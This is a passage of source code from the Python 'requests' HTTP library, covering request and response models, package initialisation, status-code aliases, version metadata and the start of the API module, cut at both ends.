import encodings.idna # noqa: F401 from io import UnsupportedOperation from urllib3.exceptions import ( DecodeError, LocationParseError, ProtocolError, ReadTimeoutError, SSLError, ) from urllib3.fields import RequestField from urllib3.filepost import encode_multipart_formdata from urllib3.util import parse_url from ._internal_utils import to_native_string, unicode_is_ascii from .auth import HTTPBasicAuth from .compat import ( Callable, JSONDecodeError, Mapping, basestring, builtin_str, chardet, cookielib, ) from .compat import json as complexjson from .compat import urlencode, urlsplit, urlunparse from .cookies import _copy_cookie_jar, cookiejar_from_dict, get_cookie_header from .exceptions import ( ChunkedEncodingError, ConnectionError, ContentDecodingError, HTTPError, InvalidJSONError, InvalidURL, ) from .exceptions import JSONDecodeError as RequestsJSONDecodeError from .exceptions import MissingSchema from .exceptions import SSLError as RequestsSSLError from .exceptions import StreamConsumedError from .hooks import default_hooks from .status_codes import codes from .structures import CaseInsensitiveDict from .utils import ( check_header_validity, get_auth_from_url, guess_filename, guess_json_utf, iter_slices, parse_header_links, requote_uri, stream_decode_response_unicode, super_len, to_key_val_list, ) #: The set of HTTP status codes that indicate an automatically #: processable redirect. REDIRECT_STATI = ( codes.moved, # 301 codes.found, # 302 codes.other, # 303 codes.temporary_redirect, # 307 codes.permanent_redirect, # 308 ) DEFAULT_REDIRECT_LIMIT = 30 CONTENT_CHUNK_SIZE = 10 * 1024 ITER_CHUNK_SIZE = 512 class RequestEncodingMixin: @property def path_url(self): """Build the path URL to use.""" url = [] p = urlsplit(self.url) path = p.path if not path: path = "/" url.append(path) query = p.query if query: url.append("?") url.append(query) return "".join(url) @staticmethod def _encode_params(data): """Encode parameters in a piece of data. Will successfully encode parameters when passed as a dict or a list of 2-tuples. Order is retained if data is a list of 2-tuples but arbitrary if parameters are supplied as a dict. """ if isinstance(data, (str, bytes)): return data elif hasattr(data, "read"): return data elif hasattr(data, "__iter__"): result = [] for k, vs in to_key_val_list(data): if isinstance(vs, basestring) or not hasattr(vs, "__iter__"): vs = [vs] for v in vs: if v is not None: result.append( ( k.encode("utf-8") if isinstance(k, str) else k, v.encode("utf-8") if isinstance(v, str) else v, ) ) return urlencode(result, doseq=True) else: return data @staticmethod def _encode_files(files, data): """Build the body for a multipart/form-data request. Will successfully encode files when passed as a dict or a list of tuples. Order is retained if data is a list of tuples but arbitrary if parameters are supplied as a dict. The tuples may be 2-tuples (filename, fileobj), 3-tuples (filename, fileobj, contentype) or 4-tuples (filename, fileobj, contentype, custom_headers). """ if not files: raise ValueError("Files must be provided.") elif isinstance(data, basestring): raise ValueError("Data must not be a string.") new_fields = [] fields = to_key_val_list(data or {}) files = to_key_val_list(files or {}) for field, val in fields: if isinstance(val, basestring) or not hasattr(val, "__iter__"): val = [val] for v in val: if v is not None: # Don't call str() on bytestrings: in Py3 it all goes wrong. 
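                    # (str(b"data") would produce the literal "b'data'",
                    # silently corrupting the field value.)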
if not isinstance(v, bytes): v = str(v) new_fields.append( ( field.decode("utf-8") if isinstance(field, bytes) else field, v.encode("utf-8") if isinstance(v, str) else v, ) ) for k, v in files: # support for explicit filename ft = None fh = None if isinstance(v, (tuple, list)): if len(v) == 2: fn, fp = v elif len(v) == 3: fn, fp, ft = v else: fn, fp, ft, fh = v else: fn = guess_filename(v) or k fp = v if isinstance(fp, (str, bytes, bytearray)): fdata = fp elif hasattr(fp, "read"): fdata = fp.read() elif fp is None: continue else: fdata = fp rf = RequestField(name=k, data=fdata, filename=fn, headers=fh) rf.make_multipart(content_type=ft) new_fields.append(rf) body, content_type = encode_multipart_formdata(new_fields) return body, content_type class RequestHooksMixin: def register_hook(self, event, hook): """Properly register a hook.""" if event not in self.hooks: raise ValueError(f'Unsupported event specified, with event name "{event}"') if isinstance(hook, Callable): self.hooks[event].append(hook) elif hasattr(hook, "__iter__"): self.hooks[event].extend(h for h in hook if isinstance(h, Callable)) def deregister_hook(self, event, hook): """Deregister a previously registered hook. Returns True if the hook existed, False if not. """ try: self.hooks[event].remove(hook) return True except ValueError: return False class Request(RequestHooksMixin): """A user-created :class:`Request <Request>` object. Used to prepare a :class:`PreparedRequest <PreparedRequest>`, which is sent to the server. :param method: HTTP method to use. :param url: URL to send. :param headers: dictionary of headers to send. :param files: dictionary of {filename: fileobject} files to multipart upload. :param data: the body to attach to the request. If a dictionary or list of tuples ``[(key, value)]`` is provided, form-encoding will take place. :param json: json for the body to attach to the request (if files or data is not specified). :param params: URL parameters to append to the URL. If a dictionary or list of tuples ``[(key, value)]`` is provided, form-encoding will take place. :param auth: Auth handler or (user, pass) tuple. :param cookies: dictionary or CookieJar of cookies to attach to this request. :param hooks: dictionary of callback hooks, for internal usage. Usage:: >>> import requests >>> req = requests.Request('GET', 'https://httpbin.org/get') >>> req.prepare() <PreparedRequest [GET]> """ def __init__( self, method=None, url=None, headers=None, files=None, data=None, params=None, auth=None, cookies=None, hooks=None, json=None, ): # Default empty dicts for dict params. 
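        # (data and files actually default to empty *lists* so they stay falsy
        # yet iterable; headers, params and hooks default to empty dicts.)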
data = [] if data is None else data files = [] if files is None else files headers = {} if headers is None else headers params = {} if params is None else params hooks = {} if hooks is None else hooks self.hooks = default_hooks() for k, v in list(hooks.items()): self.register_hook(event=k, hook=v) self.method = method self.url = url self.headers = headers self.files = files self.data = data self.json = json self.params = params self.auth = auth self.cookies = cookies def __repr__(self): return f"<Request [{self.method}]>" def prepare(self): """Constructs a :class:`PreparedRequest <PreparedRequest>` for transmission and returns it.""" p = PreparedRequest() p.prepare( method=self.method, url=self.url, headers=self.headers, files=self.files, data=self.data, json=self.json, params=self.params, auth=self.auth, cookies=self.cookies, hooks=self.hooks, ) return p class PreparedRequest(RequestEncodingMixin, RequestHooksMixin): """The fully mutable :class:`PreparedRequest <PreparedRequest>` object, containing the exact bytes that will be sent to the server. Instances are generated from a :class:`Request <Request>` object, and should not be instantiated manually; doing so may produce undesirable effects. Usage:: >>> import requests >>> req = requests.Request('GET', 'https://httpbin.org/get') >>> r = req.prepare() >>> r <PreparedRequest [GET]> >>> s = requests.Session() >>> s.send(r) <Response [200]> """ def __init__(self): #: HTTP verb to send to the server. self.method = None #: HTTP URL to send the request to. self.url = None #: dictionary of HTTP headers. self.headers = None # The `CookieJar` used to create the Cookie header will be stored here # after prepare_cookies is called self._cookies = None #: request body to send to the server. self.body = None #: dictionary of callback hooks, for internal usage. self.hooks = default_hooks() #: integer denoting starting position of a readable file-like body. self._body_position = None def prepare( self, method=None, url=None, headers=None, files=None, data=None, params=None, auth=None, cookies=None, hooks=None, json=None, ): """Prepares the entire request with the given parameters.""" self.prepare_method(method) self.prepare_url(url, params) self.prepare_headers(headers) self.prepare_cookies(cookies) self.prepare_body(data, files, json) self.prepare_auth(auth, url) # Note that prepare_auth must be last to enable authentication schemes # such as OAuth to work on a fully prepared request. # This MUST go after prepare_auth. Authenticators could add a hook self.prepare_hooks(hooks) def __repr__(self): return f"<PreparedRequest [{self.method}]>" def copy(self): p = PreparedRequest() p.method = self.method p.url = self.url p.headers = self.headers.copy() if self.headers is not None else None p._cookies = _copy_cookie_jar(self._cookies) p.body = self.body p.hooks = self.hooks p._body_position = self._body_position return p def prepare_method(self, method): """Prepares the given HTTP method.""" self.method = method if self.method is not None: self.method = to_native_string(self.method.upper()) @staticmethod def _get_idna_encoded_host(host): import idna try: host = idna.encode(host, uts46=True).decode("utf-8") except idna.IDNAError: raise UnicodeError return host def prepare_url(self, url, params): """Prepares the given HTTP URL.""" #: Accept objects that have string representations. #: We're unable to blindly call unicode/str functions #: as this will include the bytestring indicator (b'') #: on python 3.x. 
#: https://github.com/psf/requests/pull/2238 if isinstance(url, bytes): url = url.decode("utf8") else: url = str(url) # Remove leading whitespaces from url url = url.lstrip() # Don't do any URL preparation for non-HTTP schemes like `mailto`, # `data` etc to work around exceptions from `url_parse`, which # handles RFC 3986 only. if ":" in url and not url.lower().startswith("http"): self.url = url return # Support for unicode domain names and paths. try: scheme, auth, host, port, path, query, fragment = parse_url(url) except LocationParseError as e: raise InvalidURL(*e.args) if not scheme: raise MissingSchema( f"Invalid URL {url!r}: No scheme supplied. " f"Perhaps you meant https://{url}?" ) if not host: raise InvalidURL(f"Invalid URL {url!r}: No host supplied") # In general, we want to try IDNA encoding the hostname if the string contains # non-ASCII characters. This allows users to automatically get the correct IDNA # behaviour. For strings containing only ASCII characters, we need to also verify # it doesn't start with a wildcard (*), before allowing the unencoded hostname. if not unicode_is_ascii(host): try: host = self._get_idna_encoded_host(host) except UnicodeError: raise InvalidURL("URL has an invalid label.") elif host.startswith(("*", ".")): raise InvalidURL("URL has an invalid label.") # Carefully reconstruct the network location netloc = auth or "" if netloc: netloc += "@" netloc += host if port: netloc += f":{port}" # Bare domains aren't valid URLs. if not path: path = "/" if isinstance(params, (str, bytes)): params = to_native_string(params) enc_params = self._encode_params(params) if enc_params: if query: query = f"{query}&{enc_params}" else: query = enc_params url = requote_uri(urlunparse([scheme, netloc, path, None, query, fragment])) self.url = url def prepare_headers(self, headers): """Prepares the given HTTP headers.""" self.headers = CaseInsensitiveDict() if headers: for header in headers.items(): # Raise exception on invalid header value. check_header_validity(header) name, value = header self.headers[to_native_string(name)] = value def prepare_body(self, data, files, json=None): """Prepares the given HTTP body data.""" # Check if file, fo, generator, iterator. # If not, run through normal process. # Nottin' on you. body = None content_type = None if not data and json is not None: # urllib3 requires a bytes-like body. Python 2's json.dumps # provides this natively, but Python 3 gives a Unicode string. content_type = "application/json" try: body = complexjson.dumps(json, allow_nan=False) except ValueError as ve: raise InvalidJSONError(ve, request=self) if not isinstance(body, bytes): body = body.encode("utf-8") is_stream = all( [ hasattr(data, "__iter__"), not isinstance(data, (basestring, list, tuple, Mapping)), ] ) if is_stream: try: length = super_len(data) except (TypeError, AttributeError, UnsupportedOperation): length = None body = data if getattr(body, "tell", None) is not None: # Record the current file position before reading. # This will allow us to rewind a file in the event # of a redirect. try: self._body_position = body.tell() except OSError: # This differentiates from None, allowing us to catch # a failed `tell()` later when trying to rewind the body self._body_position = object() if files: raise NotImplementedError( "Streamed bodies and files are mutually exclusive." ) if length: self.headers["Content-Length"] = builtin_str(length) else: self.headers["Transfer-Encoding"] = "chunked" else: # Multi-part file uploads. 
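            # (This branch also covers ordinary form-encoded data; multipart
            # encoding is only used when `files` is supplied.)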
if files: (body, content_type) = self._encode_files(files, data) else: if data: body = self._encode_params(data) if isinstance(data, basestring) or hasattr(data, "read"): content_type = None else: content_type = "application/x-www-form-urlencoded" self.prepare_content_length(body) # Add content-type if it wasn't explicitly provided. if content_type and ("content-type" not in self.headers): self.headers["Content-Type"] = content_type self.body = body def prepare_content_length(self, body): """Prepare Content-Length header based on request method and body""" if body is not None: length = super_len(body) if length: # If length exists, set it. Otherwise, we fallback # to Transfer-Encoding: chunked. self.headers["Content-Length"] = builtin_str(length) elif ( self.method not in ("GET", "HEAD") and self.headers.get("Content-Length") is None ): # Set Content-Length to 0 for methods that can have a body # but don't provide one. (i.e. not GET or HEAD) self.headers["Content-Length"] = "0" def prepare_auth(self, auth, url=""): """Prepares the given HTTP auth data.""" # If no Auth is explicitly provided, extract it from the URL first. if auth is None: url_auth = get_auth_from_url(self.url) auth = url_auth if any(url_auth) else None if auth: if isinstance(auth, tuple) and len(auth) == 2: # special-case basic HTTP auth auth = HTTPBasicAuth(*auth) # Allow auth to make its changes. r = auth(self) # Update self to reflect the auth changes. self.__dict__.update(r.__dict__) # Recompute Content-Length self.prepare_content_length(self.body) def prepare_cookies(self, cookies): """Prepares the given HTTP cookie data. This function eventually generates a ``Cookie`` header from the given cookies using cookielib. Due to cookielib's design, the header will not be regenerated if it already exists, meaning this function can only be called once for the life of the :class:`PreparedRequest <PreparedRequest>` object. Any subsequent calls to ``prepare_cookies`` will have no actual effect, unless the "Cookie" header is removed beforehand. """ if isinstance(cookies, cookielib.CookieJar): self._cookies = cookies else: self._cookies = cookiejar_from_dict(cookies) cookie_header = get_cookie_header(self._cookies, self) if cookie_header is not None: self.headers["Cookie"] = cookie_header def prepare_hooks(self, hooks): """Prepares the given hooks.""" # hooks can be passed as None to the prepare method and to this # method. To prevent iterating over None, simply use an empty list # if hooks is False-y hooks = hooks or [] for event in hooks: self.register_hook(event, hooks[event]) class Response: """The :class:`Response <Response>` object, which contains a server's response to an HTTP request. """ __attrs__ = [ "_content", "status_code", "headers", "url", "history", "encoding", "reason", "cookies", "elapsed", "request", ] def __init__(self): self._content = False self._content_consumed = False self._next = None #: Integer Code of responded HTTP Status, e.g. 404 or 200. self.status_code = None #: Case-insensitive Dictionary of Response Headers. #: For example, ``headers['content-encoding']`` will return the #: value of a ``'Content-Encoding'`` response header. self.headers = CaseInsensitiveDict() #: File-like object representation of response (for advanced usage). #: Use of ``raw`` requires that ``stream=True`` be set on the request. #: This requirement does not apply for use internally to Requests. self.raw = None #: Final URL location of Response. self.url = None #: Encoding to decode with when accessing r.text. 
self.encoding = None #: A list of :class:`Response <Response>` objects from #: the history of the Request. Any redirect responses will end #: up here. The list is sorted from the oldest to the most recent request. self.history = [] #: Textual reason of responded HTTP Status, e.g. "Not Found" or "OK". self.reason = None #: A CookieJar of Cookies the server sent back. self.cookies = cookiejar_from_dict({}) #: The amount of time elapsed between sending the request #: and the arrival of the response (as a timedelta). #: This property specifically measures the time taken between sending #: the first byte of the request and finishing parsing the headers. It #: is therefore unaffected by consuming the response content or the #: value of the ``stream`` keyword argument. self.elapsed = datetime.timedelta(0) #: The :class:`PreparedRequest <PreparedRequest>` object to which this #: is a response. self.request = None def __enter__(self): return self def __exit__(self, *args): self.close() def __getstate__(self): # Consume everything; accessing the content attribute makes # sure the content has been fully read. if not self._content_consumed: self.content return {attr: getattr(self, attr, None) for attr in self.__attrs__} def __setstate__(self, state): for name, value in state.items(): setattr(self, name, value) # pickled objects do not have .raw setattr(self, "_content_consumed", True) setattr(self, "raw", None) def __repr__(self): return f"<Response [{self.status_code}]>" def __bool__(self): """Returns True if :attr:`status_code` is less than 400. This attribute checks if the status code of the response is between 400 and 600 to see if there was a client error or a server error. If the status code, is between 200 and 400, this will return True. This is **not** a check to see if the response code is ``200 OK``. """ return self.ok def __nonzero__(self): """Returns True if :attr:`status_code` is less than 400. This attribute checks if the status code of the response is between 400 and 600 to see if there was a client error or a server error. If the status code, is between 200 and 400, this will return True. This is **not** a check to see if the response code is ``200 OK``. """ return self.ok def __iter__(self): """Allows you to use a response as an iterator.""" return self.iter_content(128) @property def ok(self): """Returns True if :attr:`status_code` is less than 400, False if not. This attribute checks if the status code of the response is between 400 and 600 to see if there was a client error or a server error. If the status code is between 200 and 400, this will return True. This is **not** a check to see if the response code is ``200 OK``. """ try: self.raise_for_status() except HTTPError: return False return True @property def is_redirect(self): """True if this Response is a well-formed HTTP redirect that could have been processed automatically (by :meth:`Session.resolve_redirects`). 
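
        Concretely, this requires both a ``Location`` header and a status code
        listed in ``REDIRECT_STATI`` (301, 302, 303, 307 or 308).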
""" return "location" in self.headers and self.status_code in REDIRECT_STATI @property def is_permanent_redirect(self): """True if this Response one of the permanent versions of redirect.""" return "location" in self.headers and self.status_code in ( codes.moved_permanently, codes.permanent_redirect, ) @property def next(self): """Returns a PreparedRequest for the next request in a redirect chain, if there is one.""" return self._next @property def apparent_encoding(self): """The apparent encoding, provided by the charset_normalizer or chardet libraries.""" if chardet is not None: return chardet.detect(self.content)["encoding"] else: # If no character detection library is available, we'll fall back # to a standard Python utf-8 str. return "utf-8" def iter_content(self, chunk_size=1, decode_unicode=False): """Iterates over the response data. When stream=True is set on the request, this avoids reading the content at once into memory for large responses. The chunk size is the number of bytes it should read into memory. This is not necessarily the length of each item returned as decoding can take place. chunk_size must be of type int or None. A value of None will function differently depending on the value of `stream`. stream=True will read data as it arrives in whatever size the chunks are received. If stream=False, data is returned as a single chunk. If decode_unicode is True, content will be decoded using the best available encoding based on the response. """ def generate(): # Special case for urllib3. if hasattr(self.raw, "stream"): try: yield from self.raw.stream(chunk_size, decode_content=True) except ProtocolError as e: raise ChunkedEncodingError(e) except DecodeError as e: raise ContentDecodingError(e) except ReadTimeoutError as e: raise ConnectionError(e) except SSLError as e: raise RequestsSSLError(e) else: # Standard file-like object. while True: chunk = self.raw.read(chunk_size) if not chunk: break yield chunk self._content_consumed = True if self._content_consumed and isinstance(self._content, bool): raise StreamConsumedError() elif chunk_size is not None and not isinstance(chunk_size, int): raise TypeError( f"chunk_size must be an int, it is instead a {type(chunk_size)}." ) # simulate reading small chunks of the content reused_chunks = iter_slices(self._content, chunk_size) stream_chunks = generate() chunks = reused_chunks if self._content_consumed else stream_chunks if decode_unicode: chunks = stream_decode_response_unicode(chunks, self) return chunks def iter_lines( self, chunk_size=ITER_CHUNK_SIZE, decode_unicode=False, delimiter=None ): """Iterates over the response data, one line at a time. When stream=True is set on the request, this avoids reading the content at once into memory for large responses. .. note:: This method is not reentrant safe. """ pending = None for chunk in self.iter_content( chunk_size=chunk_size, decode_unicode=decode_unicode ): if pending is not None: chunk = pending + chunk if delimiter: lines = chunk.split(delimiter) else: lines = chunk.splitlines() if lines and lines[-1] and chunk and lines[-1][-1] == chunk[-1]: pending = lines.pop() else: pending = None yield from lines if pending is not None: yield pending @property def content(self): """Content of the response, in bytes.""" if self._content is False: # Read the contents. 
if self._content_consumed: raise RuntimeError("The content for this response was already consumed") if self.status_code == 0 or self.raw is None: self._content = None else: self._content = b"".join(self.iter_content(CONTENT_CHUNK_SIZE)) or b"" self._content_consumed = True # don't need to release the connection; that's been handled by urllib3 # since we exhausted the data. return self._content @property def text(self): """Content of the response, in unicode. If Response.encoding is None, encoding will be guessed using ``charset_normalizer`` or ``chardet``. The encoding of the response content is determined based solely on HTTP headers, following RFC 2616 to the letter. If you can take advantage of non-HTTP knowledge to make a better guess at the encoding, you should set ``r.encoding`` appropriately before accessing this property. """ # Try charset from content-type content = None encoding = self.encoding if not self.content: return "" # Fallback to auto-detected encoding. if self.encoding is None: encoding = self.apparent_encoding # Decode unicode from given encoding. try: content = str(self.content, encoding, errors="replace") except (LookupError, TypeError): # A LookupError is raised if the encoding was not found which could # indicate a misspelling or similar mistake. # # A TypeError can be raised if encoding is None # # So we try blindly encoding. content = str(self.content, errors="replace") return content def json(self, **kwargs): r"""Returns the json-encoded content of a response, if any. :param \*\*kwargs: Optional arguments that ``json.loads`` takes. :raises requests.exceptions.JSONDecodeError: If the response body does not contain valid json. """ if not self.encoding and self.content and len(self.content) > 3: # No encoding set. JSON RFC 4627 section 3 states we should expect # UTF-8, -16 or -32. Detect which one to use; If the detection or # decoding fails, fall back to `self.text` (using charset_normalizer to make # a best guess). encoding = guess_json_utf(self.content) if encoding is not None: try: return complexjson.loads(self.content.decode(encoding), **kwargs) except UnicodeDecodeError: # Wrong UTF codec detected; usually because it's not UTF-8 # but some other 8-bit codec. This is an RFC violation, # and the server didn't bother to tell us what codec *was* # used. pass except JSONDecodeError as e: raise RequestsJSONDecodeError(e.msg, e.doc, e.pos) try: return complexjson.loads(self.text, **kwargs) except JSONDecodeError as e: # Catch JSON-related errors and raise as requests.JSONDecodeError # This aliases json.JSONDecodeError and simplejson.JSONDecodeError raise RequestsJSONDecodeError(e.msg, e.doc, e.pos) @property def links(self): """Returns the parsed header links of the response, if any.""" header = self.headers.get("link") resolved_links = {} if header: links = parse_header_links(header) for link in links: key = link.get("rel") or link.get("url") resolved_links[key] = link return resolved_links def raise_for_status(self): """Raises :class:`HTTPError`, if one occurred.""" http_error_msg = "" if isinstance(self.reason, bytes): # We attempt to decode utf-8 first because some servers # choose to localize their reason strings. If the string # isn't utf-8, we fall back to iso-8859-1 for all other # encodings. 
(See PR #3538) try: reason = self.reason.decode("utf-8") except UnicodeDecodeError: reason = self.reason.decode("iso-8859-1") else: reason = self.reason if 400 <= self.status_code < 500: http_error_msg = ( f"{self.status_code} Client Error: {reason} for url: {self.url}" ) elif 500 <= self.status_code < 600: http_error_msg = ( f"{self.status_code} Server Error: {reason} for url: {self.url}" ) if http_error_msg: raise HTTPError(http_error_msg, response=self) def close(self): """Releases the connection back to the pool. Once this method has been called the underlying ``raw`` object must not be accessed again. *Note: Should not normally need to be called explicitly.* """ if not self._content_consumed: self.raw.close() release_conn = getattr(self.raw, "release_conn", None) if release_conn is not None: release_conn() File: src/requests/certs.py #!/usr/bin/env python """ requests.certs ~~~~~~~~~~~~~~ This module returns the preferred default CA certificate bundle. There is only one — the one from the certifi package. If you are packaging Requests, e.g., for a Linux distribution or a managed environment, you can change the definition of where() to return a separately packaged CA bundle. """ from certifi import where if __name__ == "__main__": print(where()) File: src/requests/__init__.py # __ # /__) _ _ _ _ _/ _ # / ( (- (/ (/ (- _) / _) # / """ Requests HTTP Library ~~~~~~~~~~~~~~~~~~~~~ Requests is an HTTP library, written in Python, for human beings. Basic GET usage: >>> import requests >>> r = requests.get('https://www.python.org') >>> r.status_code 200 >>> b'Python is a programming language' in r.content True ... or POST: >>> payload = dict(key1='value1', key2='value2') >>> r = requests.post('https://httpbin.org/post', data=payload) >>> print(r.text) { ... "form": { "key1": "value1", "key2": "value2" }, ... } The other HTTP methods are supported - see `requests.api`. Full documentation is at <https://requests.readthedocs.io>. :copyright: (c) 2017 by Kenneth Reitz. :license: Apache 2.0, see LICENSE for more details. """ import warnings import urllib3 from .exceptions import RequestsDependencyWarning try: from charset_normalizer import __version__ as charset_normalizer_version except ImportError: charset_normalizer_version = None try: from chardet import __version__ as chardet_version except ImportError: chardet_version = None def check_compatibility(urllib3_version, chardet_version, charset_normalizer_version): urllib3_version = urllib3_version.split(".") assert urllib3_version != ["dev"] # Verify urllib3 isn't installed from git. # Sometimes, urllib3 only reports its version as 16.1. if len(urllib3_version) == 2: urllib3_version.append("0") # Check urllib3 for compatibility. major, minor, patch = urllib3_version # noqa: F811 major, minor, patch = int(major), int(minor), int(patch) # urllib3 >= 1.21.1 assert major >= 1 if major == 1: assert minor >= 21 # Check charset_normalizer for compatibility. 
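    # chardet takes precedence when both detectors are importable; whichever
    # one is found must fall inside the version window asserted below, and a
    # failed assert is turned into a RequestsDependencyWarning by the
    # module-level caller.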
if chardet_version: major, minor, patch = chardet_version.split(".")[:3] major, minor, patch = int(major), int(minor), int(patch) # chardet_version >= 3.0.2, < 6.0.0 assert (3, 0, 2) <= (major, minor, patch) < (6, 0, 0) elif charset_normalizer_version: major, minor, patch = charset_normalizer_version.split(".")[:3] major, minor, patch = int(major), int(minor), int(patch) # charset_normalizer >= 2.0.0 < 4.0.0 assert (2, 0, 0) <= (major, minor, patch) < (4, 0, 0) else: warnings.warn( "Unable to find acceptable character detection dependency " "(chardet or charset_normalizer).", RequestsDependencyWarning, ) def _check_cryptography(cryptography_version): # cryptography < 1.3.4 try: cryptography_version = list(map(int, cryptography_version.split("."))) except ValueError: return if cryptography_version < [1, 3, 4]: warning = "Old version of cryptography ({}) may cause slowdown.".format( cryptography_version ) warnings.warn(warning, RequestsDependencyWarning) # Check imported dependencies for compatibility. try: check_compatibility( urllib3.__version__, chardet_version, charset_normalizer_version ) except (AssertionError, ValueError): warnings.warn( "urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported " "version!".format( urllib3.__version__, chardet_version, charset_normalizer_version ), RequestsDependencyWarning, ) # Attempt to enable urllib3's fallback for SNI support # if the standard library doesn't support SNI or the # 'ssl' library isn't available. try: try: import ssl except ImportError: ssl = None if not getattr(ssl, "HAS_SNI", False): from urllib3.contrib import pyopenssl pyopenssl.inject_into_urllib3() # Check cryptography version from cryptography import __version__ as cryptography_version _check_cryptography(cryptography_version) except ImportError: pass # urllib3's DependencyWarnings should be silenced. from urllib3.exceptions import DependencyWarning warnings.simplefilter("ignore", DependencyWarning) # Set default logging handler to avoid "No handler found" warnings. import logging from logging import NullHandler from . import packages, utils from .__version__ import ( __author__, __author_email__, __build__, __cake__, __copyright__, __description__, __license__, __title__, __url__, __version__, ) from .api import delete, get, head, options, patch, post, put, request from .exceptions import ( ConnectionError, ConnectTimeout, FileModeWarning, HTTPError, JSONDecodeError, ReadTimeout, RequestException, Timeout, TooManyRedirects, URLRequired, ) from .models import PreparedRequest, Request, Response from .sessions import Session, session from .status_codes import codes logging.getLogger(__name__).addHandler(NullHandler()) # FileModeWarnings go off per the default. warnings.simplefilter("default", FileModeWarning, append=True) File: src/requests/status_codes.py r""" The ``codes`` object defines a mapping from common names for HTTP statuses to their numerical codes, accessible either as attributes or as dictionary items. Example:: >>> import requests >>> requests.codes['temporary_redirect'] 307 >>> requests.codes.teapot 418 >>> requests.codes['\o/'] 200 Some codes have multiple names, and both upper- and lower-case versions of the names are allowed. For example, ``codes.ok``, ``codes.OK``, and ``codes.okay`` all correspond to the HTTP status code 200. """ from .structures import LookupDict _codes = { # Informational. 
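    # Each code maps to a tuple of aliases; _init() below registers every
    # alias (plus an upper-case variant for names not starting with "\" or
    # "/") as an attribute on the `codes` LookupDict.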
100: ("continue",), 101: ("switching_protocols",), 102: ("processing", "early-hints"), 103: ("checkpoint",), 122: ("uri_too_long", "request_uri_too_long"), 200: ("ok", "okay", "all_ok", "all_okay", "all_good", "\\o/", "✓"), 201: ("created",), 202: ("accepted",), 203: ("non_authoritative_info", "non_authoritative_information"), 204: ("no_content",), 205: ("reset_content", "reset"), 206: ("partial_content", "partial"), 207: ("multi_status", "multiple_status", "multi_stati", "multiple_stati"), 208: ("already_reported",), 226: ("im_used",), # Redirection. 300: ("multiple_choices",), 301: ("moved_permanently", "moved", "\\o-"), 302: ("found",), 303: ("see_other", "other"), 304: ("not_modified",), 305: ("use_proxy",), 306: ("switch_proxy",), 307: ("temporary_redirect", "temporary_moved", "temporary"), 308: ( "permanent_redirect", "resume_incomplete", "resume", ), # "resume" and "resume_incomplete" to be removed in 3.0 # Client Error. 400: ("bad_request", "bad"), 401: ("unauthorized",), 402: ("payment_required", "payment"), 403: ("forbidden",), 404: ("not_found", "-o-"), 405: ("method_not_allowed", "not_allowed"), 406: ("not_acceptable",), 407: ("proxy_authentication_required", "proxy_auth", "proxy_authentication"), 408: ("request_timeout", "timeout"), 409: ("conflict",), 410: ("gone",), 411: ("length_required",), 412: ("precondition_failed", "precondition"), 413: ("request_entity_too_large", "content_too_large"), 414: ("request_uri_too_large", "uri_too_long"), 415: ("unsupported_media_type", "unsupported_media", "media_type"), 416: ( "requested_range_not_satisfiable", "requested_range", "range_not_satisfiable", ), 417: ("expectation_failed",), 418: ("im_a_teapot", "teapot", "i_am_a_teapot"), 421: ("misdirected_request",), 422: ("unprocessable_entity", "unprocessable", "unprocessable_content"), 423: ("locked",), 424: ("failed_dependency", "dependency"), 425: ("unordered_collection", "unordered", "too_early"), 426: ("upgrade_required", "upgrade"), 428: ("precondition_required", "precondition"), 429: ("too_many_requests", "too_many"), 431: ("header_fields_too_large", "fields_too_large"), 444: ("no_response", "none"), 449: ("retry_with", "retry"), 450: ("blocked_by_windows_parental_controls", "parental_controls"), 451: ("unavailable_for_legal_reasons", "legal_reasons"), 499: ("client_closed_request",), # Server Error. 500: ("internal_server_error", "server_error", "/o\\", "✗"), 501: ("not_implemented",), 502: ("bad_gateway",), 503: ("service_unavailable", "unavailable"), 504: ("gateway_timeout",), 505: ("http_version_not_supported", "http_version"), 506: ("variant_also_negotiates",), 507: ("insufficient_storage",), 509: ("bandwidth_limit_exceeded", "bandwidth"), 510: ("not_extended",), 511: ("network_authentication_required", "network_auth", "network_authentication"), } codes = LookupDict(name="status_codes") def _init(): for code, titles in _codes.items(): for title in titles: setattr(codes, title, code) if not title.startswith(("\\", "/")): setattr(codes, title.upper(), code) def doc(code): names = ", ".join(f"``{n}``" for n in _codes[code]) return "* %d: %s" % (code, names) global __doc__ __doc__ = ( __doc__ + "\n" + "\n".join(doc(code) for code in sorted(_codes)) if __doc__ is not None else None ) _init() File: src/requests/packages.py import sys from .compat import chardet # This code exists for backwards compatibility reasons. # I don't like it either. Just look the other way. 
:) for package in ("urllib3", "idna"): locals()[package] = __import__(package) # This traversal is apparently necessary such that the identities are # preserved (requests.packages.urllib3.* is urllib3.*) for mod in list(sys.modules): if mod == package or mod.startswith(f"{package}."): sys.modules[f"requests.packages.{mod}"] = sys.modules[mod] if chardet is not None: target = chardet.__name__ for mod in list(sys.modules): if mod == target or mod.startswith(f"{target}."): imported_mod = sys.modules[mod] sys.modules[f"requests.packages.{mod}"] = imported_mod mod = mod.replace(target, "chardet") sys.modules[f"requests.packages.{mod}"] = imported_mod File: src/requests/__version__.py # .-. .-. .-. . . .-. .-. .-. .-. # |( |- |.| | | |- `-. | `-. # ' ' `-' `-`.`-' `-' `-' ' `-' __title__ = "requests" __description__ = "Python HTTP for Humans." __url__ = "https://requests.readthedocs.io" __version__ = "2.32.3" __build__ = 0x023203 __author__ = "Kenneth Reitz" __author_email__ = "[email protected]" __license__ = "Apache-2.0" __copyright__ = "Copyright Kenneth Reitz" __cake__ = "\u2728 \U0001f370 \u2728" File: src/requests/api.py """ requests.api ~~~~~~~~~~~~ This module implements the Requests API. :copyright: (c) 2012 by Kenneth Reitz. :license: Apache2, see LICENSE for more details. """ from . import sessions def request(method, url, **kwargs): """Constructs and sends a :class:`Request <Request>`. :param method: method for the new :class:`Request` object: ``GET``, ``OPTIONS``, ``HEAD``, ``POST``, ``PUT``, ``PATCH``, or ``DELETE``. :param url: URL for the new :class:`Request` object. :param params: (optional) Dictionary, list of tuples or bytes to send in the query string for the :class:`Request`. :param data: (optional) Dictionary, list of tuples, bytes, or file-like object to send in the body of the :class:`Request`. :param json: (optional) A JSON serializable Python object to send in the body of the :class:`Request`. :param headers: (optional) Dictionary of HTTP Headers to send with the :class:`Request`. :param cookies: (optional) Dict or CookieJar object to send with the :class:`Request`. :param files: (optional) Dictionary of ``'name': file-like-objects`` (or ``{'name': file-tuple}``) for multipart encoding upload. ``file-tuple`` can be a 2-tuple ``('filename', fileobj)``, 3-tuple ``('filename', 